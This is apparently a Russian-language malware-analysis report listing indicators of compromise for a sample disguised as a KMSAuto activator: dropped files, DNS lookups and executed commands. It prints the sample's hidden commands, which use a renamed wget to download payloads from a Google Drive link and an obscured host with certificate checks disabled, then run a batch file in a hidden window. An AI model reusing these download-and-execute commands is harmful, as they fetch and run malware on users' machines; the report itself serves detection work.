Техническая информация
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %WINDIR%\a_kb.bat
- %WINDIR%\s.txt
- %WINDIR%\w\libeay32.dll
- %WINDIR%\w\libiconv2.dll
- %WINDIR%\w\libintl3.dll
- %WINDIR%\w\libssl32.dll
- %WINDIR%\w\w.exe
- %WINDIR%\c\cu.exe
- %WINDIR%\n.exe
- %WINDIR%\kmsauto net.exe
- %WINDIR%\kmsauto.ini
- %APPDATA%\kbanditfull\kbanditfull.exe
- %WINDIR%\1r5zfvd-kl6s8odahdguzy5air5maprs7@e=download
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- %WINDIR%\1r5zfvd-kl6s8odahdguzy5air5maprs7@e=download
- http://km#.#0g.host/r/b
- DNS ASK drive.google.com
- DNS ASK do#########ocs.googleusercontent.com
- DNS ASK km#.#0g.host
- '%APPDATA%\kbanditfull\kbanditfull.exe'
- '%WINDIR%\w\w.exe' -c -P "%WINDIR%" "https://drive.google.com/u/0/uc?id=1r5ZfVD-KL6s8ODahDGUZy5AIr5maPRS7&export=download" --no-check-certificate (судя по параметрам, загрузка в %WINDIR% с отключённой проверкой сертификата сервера)
- '%WINDIR%\w\w.exe' -c -P "%WINDIR%" "http://km#.#0g.host/r/b" --referer="0101010010" --user-agent="kbf" (запрос по незашифрованному HTTP с фиксированными значениями заголовков Referer и User-Agent)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a_kb.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a_kb.bat" "